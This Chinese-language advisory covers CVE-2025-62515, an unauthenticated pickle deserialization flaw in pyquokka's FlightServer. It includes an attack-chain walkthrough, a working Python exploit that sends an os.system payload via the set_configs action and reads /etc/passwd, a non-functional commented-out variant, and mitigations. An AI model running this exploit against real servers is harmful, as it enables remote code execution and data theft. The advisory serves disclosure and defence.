CVE-2025-62515：pyquokka反序列化漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-62515

漏洞类型

不安全反序列化（远程代码执行）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

pyquokka

漏洞概述

CVE-2025-62515是pyquokka框架中存在的一个高危反序列化漏洞，CVSS评分为9.8，属于严重级别。pyquokka是一个用于时序数据湖处理的框架，在0.3.1及之前版本中，其FlightServer类在处理来自Flight客户端的Action请求时，直接调用Python内置的pickle.loads()函数对数据进行反序列化操作，而未对输入数据进行任何过滤、校验或签名验证。pickle模块在反序列化过程中可以执行任意Python代码，当攻击者构造恶意的pickle序列化数据并通过网络发送到监听在0.0.0.0的FlightServer时，服务器将自动执行其中的恶意代码，从而导致远程代码执行（RCE）。该漏洞的影响范围涵盖机密性、完整性和可用性三个维度，均为高影响。攻击者无需任何认证或用户交互即可利用此漏洞，对系统安全构成极大威胁。受影响的代码路径不仅限于do_action方法，还包括cache_garbage_collect、do_put和do_get等函数，这些函数同样使用了pickle.loads()对来自远程客户端的不可信数据进行反序列化处理，扩大了攻击面。

技术细节

该漏洞的根本原因在于pyquokka框架对不可信远程数据使用了Python的pickle模块进行反序列化。pickle.loads()函数在反序列化过程中会调用Python对象的__reduce__、__setstate__等魔术方法，攻击者可以利用这些机制执行任意系统命令。

具体漏洞点位于pyquokka/flight.py文件的第283行，do_action()方法直接将从Flight客户端接收到的action body数据传递给pickle.loads()函数。当FlightServer配置监听在0.0.0.0地址时（默认配置），任何能够访问该网络的主机都可以作为攻击源。

攻击者首先需要构造一个恶意的pickle payload。常见的构造方式是使用__reduce__方法返回一个可调用对象，例如os.system或subprocess.Popen等。然后将该payload通过set_configs action发送给FlightServer。当服务器调用pickle.loads()处理该数据时，__reduce__方法中定义的恶意代码将在服务器进程中执行。

除了do_action方法外，cache_garbage_collect、do_put和do_get函数中也存在类似的pickle.loads()调用，这些函数处理来自远程客户端的数据时同样缺乏安全验证，构成了多个攻击入口点。攻击者可以利用这些入口点之一来执行任意代码，包括但不限于读取敏感文件、安装后门、窃取数据、横向移动等。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过网络扫描或资产发现技术，识别目标网络中运行pyquokka FlightServer的服务器，确认服务监听在0.0.0.0地址上且端口可访问。

STEP 2

步骤2：构造恶意Payload

攻击者利用Python的pickle模块构造恶意序列化数据，通过实现__reduce__方法返回os.system或subprocess.Popen等危险函数调用，实现任意命令执行。

STEP 3

步骤3：建立连接

攻击者使用pyarrow.flight客户端库或其他gRPC客户端连接到目标FlightServer，建立与pyquokka服务的通信通道。

STEP 4

步骤4：发送恶意Action

攻击者将恶意pickle payload封装到set_configs等Action请求中，通过do_action方法发送到FlightServer，触发服务器端的pickle.loads()反序列化操作。

STEP 5

步骤5：远程代码执行

服务器调用pickle.loads()处理恶意数据时，__reduce__方法中定义的恶意代码在服务器进程中执行，攻击者获得远程代码执行权限。

STEP 6

步骤6：权限提升与持久化

攻击者在服务器上执行命令后，可进一步进行权限提升、安装后门、窃取敏感数据或进行横向移动，完成整个攻击链。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-62515 PoC - pyquokka pickle deserialization RCE
Exploits unsafe pickle.loads() in FlightServer.do_action()
"""

import pickle
import os
import socket
import struct
import pyarrow.flight as flight

class MaliciousPayload:
    """Crafted pickle payload that executes arbitrary commands"""
    def __reduce__(self):
        # Command to execute on the target server
        cmd = "id; whoami; uname -a; cat /etc/passwd | head -5"
        return (os.system, (cmd,))

def craft_pickle_payload(command="id"):
    """Generate a malicious pickle payload for RCE"""
    class Exploit:
        def __reduce__(self):
            return (os.system, (command,))
    return pickle.dumps(Exploit())

def exploit_flight_server(host, port=8080, command="id"):
    """
    Connect to vulnerable pyquokka FlightServer and send
    malicious payload via set_configs action
    """
    # Connect to the Flight server
    client = flight.FlightClient(f"grpc+tcp://{host}:{port}")

    # Craft the malicious action with pickle payload
    malicious_body = craft_pickle_payload(command)

    # Send via set_configs action (triggers do_action -> pickle.loads)
    action = flight.Action("set_configs", malicious_body)

    print(f"[*] Sending malicious payload to {host}:{port}")
    print(f"[*] Command to execute: {command}")

    try:
        results = list(client.do_action(action))
        print("[+] Payload sent successfully")
        for result in results:
            print(f"[+] Response: {result.body.to_pybytes().decode()}")
    except Exception as e:
        print(f"[*] Request completed (server may have crashed): {e}")

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8080
    cmd = sys.argv[3] if len(sys.argv) > 3 else "id"

    exploit_flight_server(target, port, cmd)

# Alternative: Direct socket-based exploit for lower-level testing
# def raw_exploit(host, port):
#     import pickle
#     payload = pickle.dumps({"__reduce__": [os.system, ("id",)]})
#     # Wrap in Arrow Flight protocol format and send via TCP
#     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     sock.connect((host, port))
#     # ... (Arrow Flight gRPC framing required)

影响范围

pyquokka <= 0.3.1

防御指南

临时缓解措施

在等待官方修复版本发布之前，建议采取以下临时缓解措施：1）将FlightServer的监听地址从0.0.0.0修改为127.0.0.1，仅允许本地访问；2）在网络层面部署防火墙规则，限制FlightServer服务端口（默认为8080）的外部访问；3）使用iptables或安全组策略限制可访问该服务的IP地址范围；4）在应用层添加对set_configs等Action的访问控制列表（ACL），仅允许可信客户端调用；5）监控服务器进程的异常行为，如可疑的系统调用或网络连接；6）考虑使用反向代理或VPN将FlightServer服务隔离在内网环境中。